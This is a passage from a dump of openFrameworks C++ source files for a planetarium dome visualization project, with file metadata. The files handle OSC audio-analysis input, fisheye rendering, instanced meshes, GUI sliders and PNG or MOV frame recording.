data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:ONSET\", 0.0);\n \n oscTLtrack = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":TIMELINE:TL-default\", 0.0);\n \n}\n//--------------------------------------------------------------\nvoid ofApp::receiveOsc(){\n \n \n // check for waiting messages\n while(receiver.hasWaitingMessages()){\n // get the next message\n ofxOscMessage m;\n receiver.getNextMessage(&m);\n \n if(m.getAddress()==\"/ch0\"){\n oscPower = m.getArgAsFloat(0);\n oscFreq = m.getArgAsFloat(1);\n oscConfidence = m.getArgAsFloat(2);\n oscSalience = m.getArgAsFloat(3);\n oscHfc = m.getArgAsFloat(4);\n oscCentroid = m.getArgAsFloat(5);\n oscSpecComp = m.getArgAsFloat(6);\n oscInharm = m.getArgAsFloat(7);\n oscOnset = m.getArgAsInt32(8);\n }\n else if(m.getAddress()==\"/TL-default\"){\n oscTLtrack = m.getArgAsFloat(0);\n }\n\n }\n\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::startAnimation(){\n isAnimating=true;\n ofLogNotice(\"Animation STARTED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::stopAnimation(){\n frameCounter = -1;\n lastFrameWithOnset = 0;\n isAnimating = false;\n ofLogNotice(\"Animation STOPED\");\n}\n\n" }, { "alpha_fraction": 0.6258412003517151, "alphanum_fraction": 0.6271870732307434, "avg_line_length": 17.121952056884766, "blob_id": "4c452450a9030505ceba874055543c1e971456ab", "content_id": "88b5ae444b636506ca49048cf00e5020cdf61c95", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 743, "license_type": "permissive", "max_line_length": 54, "num_lines": 41, "path": "/Graphics/addons/ofxDomemaster/src/ofxDomemaster.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n\nclass ofxDomemaster{\n\n\tpublic:\n\t\tstatic const int renderCount = 5;\n ofxDomemaster();\n\t\tvoid setup();\n\t\tvoid draw();\n\t\tvoid drawMask();\n void begin(int i);\n void end(int i);\n void resize(int w, int h);\n void setCameraPosition(float x, float y, float z);\n void setMeshScale(float s);\n\t\tint width;\n int height;\n\n private:\n ofRectangle view;\n vector<ofCamera> renderCamera;\n vector<ofFbo> renderFbo;\n vector<ofVboMesh> renderMesh;\n ofCamera fisheyeCamera;\n ofRectangle fisheyeView;\n ofImage mask;\n\n float meshScale;\n float meshScaleExt;\n ofNode cameraNode;\n enum positions{\n bottom,\n front,\n left,\n right,\n top\n };\n\n};\n" }, { "alpha_fraction": 0.6690544486045837, "alphanum_fraction": 0.6776504516601562, "avg_line_length": 18.94285774230957, "blob_id": "ff8edd358aac982fd9a0ca2c5bb14cf3b0259d6c", "content_id": "9335558d00361b3262e7ba97e78e3fcc3cc06c33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 698, "license_type": "no_license", "max_line_length": 68, "num_lines": 35, "path": "/Graphics/apps/videoTest_3/src/ImageSaverThread.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n * ImageSaverThread.h\n *\n * Created on: Oct 14, 2014\n * Author: arturo\n */\n#pragma once\n#include \"ofMain.h\"\nclass ImageSaverThread: public ofThread{\npublic:\n\tImageSaverThread();\n\t~ImageSaverThread();\n\n\tvoid save(unsigned char * pixels);\n\tvoid waitReady();\n\tvoid threadedFunction();\n \n void setImageSize(int w, int h){\n width = w;\n heigth = h;\n };\n void setLastFrameMarker(int frameNum){lastFrameMarker=frameNum;}\n int getlastFrameMarker(){return lastFrameMarker;}\n\nprivate:\n\tofPixels pixels;\n\tofThreadChannel<unsigned char *> channel;\n\tofThreadChannel<bool> channelReady;\n\tbool firstFrame;\n \n int width;\n int heigth;\n int lastFrameMarker;\n \n};\n" }, { "alpha_fraction": 0.47603639960289, "alphanum_fraction": 0.5008088946342468, "avg_line_length": 29.060791015625, "blob_id": "251d8afda31a2c5f0afbb6da1a3273f818cc0316", "content_id": "4e834879992527b2bf06fc3b3404f56bb3e696c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9890, "license_type": "no_license", "max_line_length": 105, "num_lines": 329, "path": "/Graphics/apps/videoTest_BA_Planetarium/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n\n ofSetBackgroundColor(50);\n ofSetFrameRate(FRAME_RATE);\n\n frameDuration = 1.0 / FRAME_RATE;\n framesMaxNumber = DURATION * FRAME_RATE;\n frameCounter = 0;\n isAnimating = false;\n\n fisheye.setup(tVariableFisheye);\n fisheyeAmount = 0.0;\n\n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);\n\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n\n ofSetCircleResolution(60);\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n\n //display frame rate as window title\n ofSetWindowTitle(ofToString(ofGetFrameRate()));\n\n //animation data update\n if(isAnimating){\n frameCounter++;\n animationTime = frameCounter * frameDuration;\n animValue = animationTime/DURATION;\n\n //end recording and animation at 15\"\n if (frameCounter>=framesMaxNumber){\n stopAnimation();\n renderer.stopRecording();\n }\n }\n //-----------------------------------\n\n int rw = renderer.getFboWidth();\n int rh = renderer.getFboHeight();\n\n //draw openGL scene in drawFbo\n drawFbo.begin();\n ofClear(0);\n drawScene(rw, rh);\n drawFbo.end();\n\n //draw drawFbo into Renderer's FBO with Fisheye FX\n fisheyeAmount = animValue * 0.35 + 0.5; //animated from 0.5 to 0.85\n renderer.getFbo()->begin();\n ofClear(0);\n fisheye.begin(drawFbo.getTexture(), rw, rh, fisheyeAmount);\n glBegin(GL_QUADS);\n glTexCoord2f(0, 0); glVertex3f(0, 0, 0);\n glTexCoord2f(rw, 0); glVertex3f(rw, 0, 0);\n glTexCoord2f(rw, rh); glVertex3f(rw, rh, 0);\n glTexCoord2f(0,rh); glVertex3f(0, rh, 0);\n glEnd();\n fisheye.end();\n renderer.getFbo()->end();\n\n //Record Renderer's FBO into a .mov file or png sequence\n renderer.update();\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n\n //Scaled Renderer's FBO preview----------\n renderer.draw(250, 0, 512, 512);\n\n //Recording indicator-------------------\n if(renderer.getIsRecording()){\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(ofGetWidth() - 60, 60);\n ofSetColor(255, 0, 0);\n ofDrawCircle(0,0, 40);\n ofSetColor(ofColor::white);\n ofDrawBitmapString(\"REC\", -10, 0);\n ofPopMatrix();\n ofPopStyle();\n }\n\n //Display Key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nSpacebar: START/STOP Animation\"\n \"\\nr: START/STOP Recording & Animation\"\n \"\\np: Secuencia Png\"\n \"\\nm: Archivo MOV-H264\"\n \"\\n1: 256x256\"\n \"\\n2: 512x512\"\n \"\\n3: 1024x1024\"\n \"\\n4: 2048x2048\"\n \"\\n5: 4096x4096\";\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, 10, 20);\n ofPopStyle();\n\n //Display Info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n + \"\\nREC mode: \" + renderer.getRecordingModeAsString();\n if(renderer.getIsRecording()){\n info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n }\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, 10, ofGetHeight()-100);\n ofPopStyle();\n\n\n\n}\n//--------------------------------------------------------------\nvoid ofApp::exit(){\n renderer.exit();\n}\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n\n switch (key) {\n //start-stop Animation--------------------\n case ' ':\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //start-stop Animation & Recording---------------\n case 'r':\n if(!renderer.getIsRecording())renderer.startRecording();\n else renderer.stopRecording();\n\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //change resolution-----------------------------\n case '1':\n if(renderer.getOutputResolution()!= r256){\n renderer.setOutputResolution(r256);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n case '2':\n if(renderer.getOutputResolution()!= r512){\n renderer.setOutputResolution(r512);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n case '3':\n if(renderer.getOutputResolution()!= r1024){\n renderer.setOutputResolution(r1024);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n case '4':\n if(renderer.getOutputResolution()!= r2048){\n renderer.setOutputResolution(r2048);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n case '5':\n if(renderer.getOutputResolution()!= r4096){\n renderer.setOutputResolution(r4096);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n }\n break;\n\n //change recording mode---------------\n case 'p':\n if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n break;\n case 'm':\n if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n break;\n\n default:\n break;\n }\n}\n//--------------------------------------------------------------\nvoid ofApp::drawScene(int w, int h){\n\n //LINEAR MOTION------------\n ofPushStyle();\n ofFill();\n //left to right moving circle\n ofSetColor(ofColor::red);\n ofDrawCircle(animValue*w, h*.5, w*0.05);\n //top to bottom moving circle\n ofSetColor(ofColor::violet);\n ofDrawCircle(w*.5, animValue*h, w*0.05);\n ofPopStyle();\n\n //CONCENTRIC MOTION------------------\n int circlesNum = 5;\n float speed = 2;\n ofSetRectMode(OF_RECTMODE_CENTER);\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(w*.5, h*.5);\n ofNoFill();\n ofSetColor(ofColor::white);\n ofSetLineWidth(w*0.002);\n for (int i=0; i<circlesNum; i++) {\n float v = animValue + (1/(float)circlesNum) * i ;\n if(v>1.0) v-= 1.0;\n int rad = (int)(v * speed * (h*.5)) % (int)(w*.5) ;\n //ofDrawCircle(0, 0, rad);\n ofDrawRectangle(0, 0, rad*2, rad*2);\n }\n ofPopMatrix();\n ofPopStyle();\n\n //ROTATION----------------------\n int linesNum = 8;\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(w*.5, h*.5);\n ofRotate(animValue*360);\n ofSetColor(ofColor::green);\n ofSetLineWidth( w*0.003);\n for (int i=0; i<linesNum; i++) {\n float angle = ofDegToRad((360/(float)linesNum) * i);\n float radius = w*.5;\n float x = radius * cos(angle);\n float y = radius * sin(angle);\n ofDrawLine(0, 0, x, y);\n }\n ofPopMatrix();\n ofPopStyle();\n\n //DOME CIRCLE PROJECTION LIMIT DISPLAY-----------------\n ofPushStyle();\n ofSetColor(ofColor::red);\n ofNoFill();\n ofSetLineWidth( w*0.004);\n ofDrawCircle(w*.5, h*.5, w*.5);\n ofPopStyle();\n\n //INFO DISPLAY--------------------------------\n ofPushStyle();\n ofSetColor(ofColor::yellow);\n string sceneInfo = \"Time: \" + ofToString(animationTime, 2)\n + \"\\nFisheye: \" + ofToString(fisheyeAmount, 2);\n verdana.drawString(sceneInfo, w*.35, h*.4);\n ofPopStyle();\n}\n\n//--------------------------------------------------------------\nvoid ofApp::startAnimation(){\n isAnimating=true;\n ofLogNotice(\"Animation STARTED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::stopAnimation(){\n frameCounter = 0;\n isAnimating = false;\n ofLogNotice(\"Animation STOPED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::keyReleased(int key){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseMoved(int x, int y ){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseDragged(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mousePressed(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseReleased(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseEntered(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseExited(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::windowResized(int w, int h){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::gotMessage(ofMessage msg){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::dragEvent(ofDragInfo dragInfo){\n\n}\n" }, { "alpha_fraction": 0.5698029398918152, "alphanum_fraction": 0.5964474081993103, "avg_line_length": 26.669231414794922, "blob_id": "56b69db855d3f0e11839ac155adec911fd565164", "content_id": "136115a200226603d713121502e4479b016faaf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3603, "license_type": "no_license", "max_line_length": 105, "num_lines": 130, "path": "/Graphics/apps/videoTest_2/src/instancedManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#include \"instancedManager.h\"\n\nvoid InstancedManager::setup(){\n \n ofBoxPrimitive tmpBox;\n\ttmpBox.set(1.0);// set the size\n\tvboMesh = tmpBox.getMesh();\n \n \tshaderInst.load(\"shadersGL2/instancedRad.vert\", \"shadersGL2/instancedRad.frag\");\n \n _mode = LINEAL;\n _hRes = 40;\n _vRes = 20;\n _width = 100;\n _height = 30;\n \n Orient.set(1,1,1);\n yPos = 0.0;\n bDoQuilombo =false;\n velX=1.0;\n maskRadius=0.0;\n \n velCounter = 1;\n \n //material--\n material.setShininess( 100 ); // shininess is a value between 0 - 128, 128 being the most shiny //\n material.setSpecularColor(ofColor(255.f, 255.f, 255.f, 255.f));\n material.setDiffuseColor(mainColor);\n}\n\n\n//--------------------------------------\nvoid InstancedManager::draw(){\n \n ofEnableDepthTest();\n\tofDisableAlphaBlending();\n\n material.begin();\n \n ofPushStyle();\n\tofSetColor(mainColor);\n \n ofPushMatrix();\n //set x - y\n //lineal\n if(_mode==LINEAL && _vRes>1)\n ofTranslate(xPos*Lim.x, _height*(-.5) + (yPos*Lim.y),0);\n //radial\n else if(_mode!=LINEAL && _vRes>1)\n ofTranslate(xPos*Lim.x, Lim.y*(.5) + (yPos*Lim.y),0);\n \n \n if(Orient.x<0){\n ofRotateY(180);\n ofTranslate(Lim.x*Orient.x, 0);\n }\n\n\tshaderInst.begin();//---------------------------------------\n if (_mode == LINEAL)\n shaderInst.setUniform1i(\"uMode\", 0);\n else if(_mode == RAD_CONCENTRIC)\n shaderInst.setUniform1i(\"uMode\", 1);\n else if(_mode == RAD_CENTRIFUGE)\n shaderInst.setUniform1i(\"uMode\", 2);\n \n shaderInst.setUniform1f(\"uDeformRad\", radDeform);\n \n\tshaderInst.setUniform1i(\"uHres\", _hRes);\n shaderInst.setUniform1i(\"uWidth\", _width);\n shaderInst.setUniform1i(\"uVres\", _vRes);\n shaderInst.setUniform1i(\"uHeight\", _height);\n\tshaderInst.setUniform1f(\"timeValue\", (velCounter% 3000) / 3000.0f);\n //shaderInst.setUniform1f(\"timeValue_b\", ofGetElapsedTimeMillis()); //time dependant\n shaderInst.setUniform1f(\"timeValue_b\", velCounter*10.0); //frame dependant\n \n shaderInst.setUniform1f(\"uTimeNoise\", noiseTime);\n \n shaderInst.setUniform1f(\"uXnoiseFreq\", xNoiseFreq);\n shaderInst.setUniform1f(\"uXnoiseAmp\", xNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uXnoiseRug\", xNoiseRug);\n \n shaderInst.setUniform1f(\"uYnoiseFreq\", yNoiseFreq);\n shaderInst.setUniform1f(\"uYnoiseAmp\", yNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uYnoiseRug\", yNoiseRug);\n \n shaderInst.setUniform1f(\"uZnoiseFreq\", zNoiseFreq);\n shaderInst.setUniform1f(\"uZnoiseAmp\", zNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uZnoiseRug\", zNoiseRug);\n \n\n vboMesh.drawInstanced(OF_MESH_FILL, _hRes * _vRes);\n \n\tshaderInst.end();//------------------------------------\n material.end();\n \n\tofDisableDepthTest();\n //----\n velCounter+=velX;\n \n ofPopMatrix();\n \n ofPopStyle();\n \n // centered black circle\n// ofPushStyle();\n// ofSetColor(ofColor::black);\n// ofDrawCircle(xPos*Lim.x + Lim.x*.5, ofGetHeight()*(.5) + (yPos*Lim.y),0, maskRadius*_height);\n// ofPopStyle();\n \n \n}\n\n\n//--------------------------------------\nvoid InstancedManager::exit(){\n\n}\n//--------------------------------------\nvoid InstancedManager::setCubeSize(float val){\n cubeSize = val;\n ofBoxPrimitive tmpBox;\n tmpBox.set(cubeSize);// set the size\n\tvboMesh = tmpBox.getMesh();\n}\n//--------------------------------------\nvoid InstancedManager::setCubeSize(ofVec3f size){\n ofBoxPrimitive tmpBox;\n tmpBox.set(size.x, size.y, size.z);\n vboMesh = tmpBox.getMesh();\n}\n\n\n\n\n" }, { "alpha_fraction": 0.6433566212654114, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 15.5, "blob_id": "a929c5d3c798128b8c7f967e854b55458e9d8574", "content_id": "528678a3014d0adc24d5ff80957342eba424502e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 858, "license_type": "no_license", "max_line_length": 46, "num_lines": 52, "path": "/Graphics/apps/videoTest_2/src/GuiManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "//\n// GuiManager.h\n// videoTest_2\n//\n// Created by Leo on 4/13/16.\n//\n//\n\n#ifndef GuiManager_h\n#define GuiManager_h\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\nclass GuiManager {\n\npublic:\n \n void setup();\n void draw();\n \n //gui\n ofxToggle gMode, gRadMode;\n ofxFloatSlider gRadDeform;\n \n ofxFloatSlider gWidth, gHeight, gHres,\n gVres, gVelocity, gYpos, gXpos;\n \n ofxVec3Slider gCubesize;\n ofxFloatSlider gCubesizeUnified;\n \n ofxFloatSlider gMaskRadius;\n \n ofxFloatSlider gNzTime;\n ofxFloatSlider gNzXAmp, gNzXRug, gNzXFreq;\n ofxFloatSlider gNzYAmp, gNzYRug, gNzYFreq;\n ofxFloatSlider gNzZAmp, gNzZRug, gNzZFreq;\n \n ofxToggle gUseCam;\n ofxToggle gAxis;\n ofxToggle gUseLight;\n ofxVec3Slider gLightPos;\n \n //ofxButton b1;\n \n ofxPanel gui;\n\n\n};\n\n\n#endif /* GuiManager_hpp */\n" }, { "alpha_fraction": 0.5102322101593018, "alphanum_fraction": 0.5337957739830017, "avg_line_length": 26.96010971069336, "blob_id": "18bc248fff66a04de4a3b1fa37fe70721c78ff59", "content_id": "125a1806d130a1a597c841a863463aefac4e14fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 20328, "license_type": "no_license", "max_line_length": 127, "num_lines": 727, "path": "/Graphics/apps/final/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n/*\n Para renderizar:\n 1- SphereManager setupGui() -> zPos\n 2- setup()->renderer.setup()\n 3- update()->receiveOsc()\n */\n\n#pragma mark - Core Funcs\nint _startingFrameNum = 2359;\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n \n ofSetBackgroundColor(0);\n ///FRAME RATE: 30\n ofSetFrameRate(FRAME_RATE);\n ofSetLogLevel(OF_LOG_VERBOSE);\n ofEnableAlphaBlending();\n ofEnableDepthTest();\n \n //Setup settings-----------------\n data.load(\"analysisData.xml\");\n \n int frameRate = data.getValue(\"FILE-INFO:frameRate\",0);\n int totalFramesNum = data.getValue(\"FILE-INFO:totalFramesNum\", 0);\n cout<<\"frameRate - \"<<frameRate<<endl;\n cout<<\"total frames - \"<<totalFramesNum<<endl;\n \n //renderer setup-------------------\n \n framesMaxNumber = totalFramesNum;\n frameCounter = _startingFrameNum;\n \n isAnimating = false;\n ofLogVerbose()<<\"ANIMATION INFO ---- \";\n \n \n fisheye.setup(tVariableFisheye);\n fisheyeAmount = 0.0;\n \n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r256);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r512);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r2048);///init resolution and mode\n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r4096);///init resolution and mode\n \n renderer.frameNumOffset = _startingFrameNum;\n \n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n \n //----\n \n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n fw = drawFbo.getWidth();\n fh = drawFbo.getHeight();\n \n fboPost.allocate(fw, fh);\n fboPost.begin();\n ofClear(0,0,0,1);\n fboPost.end();\n \n fboInstanced.allocate(fw, fh, GL_RGBA);\n fboInstanced.begin();\n ofClear(255,255,255, 0);\n fboInstanced.end();\n \n fboParticles.allocate(fw, fh, GL_RGBA);\n fboParticles.begin();\n ofClear(255,255,255, 0);\n fboParticles.end();\n \n fboSphere.allocate(fw, fh, GL_RGBA);\n fboSphere.begin();\n ofClear(255,255,255, 0);\n fboSphere.end();\n \n \n //gui-------------\n setupGui();\n bShowGuiCubeSphere = true;\n bShowGuiPair = true;\n bShowGuiInstanced = true;\n \n \n //----------------------------\n _center.set(fw*0.5, fh*0.5, 0.0);\n cam.disableMouseInput();\n cam.setPosition(ofVec3f(_center.x, _center.y, fw*0.7));\n cam.lookAt(_center);\n cam.setTarget(_center);\n \n light.setPosition(fw*0.2, fw*.5, fh*0.3);\n light.setPointLight();\n \n //Instanced---------------------------\n instanced.setup(fw);\n instanced.setLimits(ofVec3f(fw, fh, 100));\n instanced.setOrientation(ofVec3f(1,1,1));\n instanced.setColor(COLOR_INSTANCED);\n \n //Particles------------------\n pair.setup(0, fh*0.5, fw, fh, OUT);\n pair.setColor(COLOR_PARTICLES);\n \n //Sphere------------------------\n sphere.setup();\n sphere.setColor(COLOR_SPHERE);\n sphere.setPosition(_center);\n \n //Post-Procesing-------------------------------\n postManager.setup(fw, fh);\n \n //OSC------------------------------------------\n receiver.setup(PORT);\n \n oscSphereValue3 = oscSphereValue2 = oscSphereValue1 = 0;\n oscPartsValue3 = oscPartsValue2 = oscPartsValue1 = 0;\n oscInstValue2 = oscInstValue1 = 0;\n \n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n //display frame rate as window title\n ofSetWindowTitle(ofToString(ofGetFrameRate()));\n \n //animation frameNumUpdate\n if(isAnimating){\n frameCounter++;\n //end recording and animation at 15\"\n if (frameCounter>=framesMaxNumber){\n stopAnimation();\n renderer.stopRecording();\n }\n }\n \n \n //receiveOsc----------------\n //!!! Osc\n if(gReceiveOSC){\n //receiveOsc();\n updateOscFromDataFile(frameCounter);\n //updateOscFromDataFile(gFramePlayer);\n }else{\n \n }\n \n //update graphics--------------------------------\n updateInstanced();\n updatePair();\n updateSphere();\n \n \n //update post-processing------------------------\n postManager.updateValues();\n \n //light pos\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n gLightPos->z * fw );\n \n \n //-----------------------------------\n \n int rw = renderer.getFboWidth();\n int rh = renderer.getFboHeight();\n \n ///draw openGL scene in drawFbo------------------\n drawFboInstanced();\n drawFboParticles();\n drawFboSphere();\n \n drawFboMain();\n \n drawFboPost();\n ///-------------------------------\n \n \n fisheyeAmount = 0.6;\n renderer.getFbo()->begin();\n ofClear(0);\n fisheye.begin(fboPost.getTexture(), rw, rh, fisheyeAmount);///which fbo to render\n glBegin(GL_QUADS);\n glTexCoord2f(0, 0); glVertex3f(0, 0, 0);\n glTexCoord2f(rw, 0); glVertex3f(rw, 0, 0);\n glTexCoord2f(rw, rh); glVertex3f(rw, rh, 0);\n glTexCoord2f(0,rh); glVertex3f(0, rh, 0);\n glEnd();\n fisheye.end();\n renderer.getFbo()->end();\n \n //Record Renderer's FBO into a .mov file or png sequence\n renderer.update();\n\n\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n ofBackground(0);\n \n \n //fboPost.draw(ofGetWidth()-768, 0, fw, fh);\n renderer.draw(ofGetWidth()-768, 0, 768, 768);\n\n \n //drawGuis------------------\n if (bShowGuiInstanced)\n instanced.drawGui();\n if(bShowGuiPair)\n guiPair.draw();\n if(bShowGuiCubeSphere)\n sphere.drawGui();\n \n guiMain.draw();\n \n postManager.drawGui(200,500);\n \n \n //Recording indicator-------------------\n if(renderer.getIsRecording()){\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(ofGetWidth() - 60, 60);\n ofSetColor(255, 0, 0);\n ofDrawCircle(0,0, 40);\n ofSetColor(ofColor::white);\n ofDrawBitmapString(\"REC\", -10, 0);\n ofPopMatrix();\n ofPopStyle();\n }\n \n //Display Key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nSpacebar: START/STOP Animation\"\n \"\\nr: START/STOP Recording & Animation\"\n \"\\np: Secuencia Png\"\n \"\\nm: Archivo MOV-H264\"\n \"\\n1: 256x256\"\n \"\\n2: 512x512\"\n \"\\n3: 1024x1024\"\n \"\\n4: 2048x2048\"\n \"\\n5: 4096x4096\";\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, ofGetWidth()-200, 20);\n ofPopStyle();\n \n //Display Info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n + \"\\nREC mode: \" + renderer.getRecordingModeAsString() +\n + \"\\nframeCounter: \" + ofToString(frameCounter);\n if(renderer.getIsRecording()){\n info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n }\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, ofGetWidth()-200, ofGetHeight()-100);\n ofPopStyle();\n\n \n \n}\n\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n \n switch (key){\n// case 'a':\n// pair.addPartGroup(1);\n// break;\n// case 'k':\n// pair.addPartGroup(2);\n// break;\n \n \n \n //start-stop Animation--------------------\n case ' ':\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //start-stop Animation & Recording---------------\n case 'r':\n if(!renderer.getIsRecording())renderer.startRecording();\n else renderer.stopRecording();\n \n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n \n// //change recording mode---------------\n// case 'p':\n// if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n// break;\n// case 'm':\n// if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n// break;\n \n default:\n break;\n }\n \n}\n#pragma mark - Fbo draw funcs\n//--------------------------------------------------------------\nvoid ofApp::drawDomeLimits(int w, int h){\n \n \n //ofBackground(255);\n int x = w*0.5;\n int y = h*0.5;\n int rad = w*0.5;\n \n ofPushStyle();\n ofSetCircleResolution(30);\n ofNoFill();\n //full\n ofSetColor(ofColor::red);\n ofDrawCircle(x,y,rad);\n// //mid\n// ofSetColor(ofColor::orange);\n// ofDrawCircle(x,y,rad*0.66);\n// //small\n// ofSetColor(ofColor::yellow);\n// ofDrawCircle(x,y,rad*0.33);\n \n \n ofPopStyle();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboPost(){\n\n fboPost.begin();\n ofClear(0,0,0,1);\n \n ofDisableAlphaBlending();\n \n postManager.begin();\n drawFbo.draw(0,0);\n postManager.end();\n \n fboPost.end();\n \n ofEnableAlphaBlending();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboMain(){\n \n drawFbo.begin();\n \n ofClear(0, 0, 0, 0);\n \n if(gDoDrawInstanced)fboInstanced.draw(0,0);\n \n if(gDoDrawParts) fboParticles.draw(0,0);\n \n \n if(gDoDrawSphere) fboSphere.draw(0,0);\n \n if(gDoDrawDomeLimits) drawDomeLimits(fw, fh);\n \n drawFbo.end();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboInstanced(){\n \n \n ofEnableAlphaBlending();\n \n fboInstanced.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n if(gUseLight){\n ofEnableLighting();\n light.enable();\n \n //tweak\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n 0.05 * fw );\n }\n \n cam.begin();\n \n //??? hacen falta estos guachines?\n ofEnableDepthTest();\n ofDisableAlphaBlending();\n //-----------------------\n \n instanced.drawScene();\n \n \n ofDisableDepthTest();//??? hace falta?\n \n cam.end();\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n //----------------------------\n fboInstanced.end();\n \n \n \n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboParticles(){\n\n 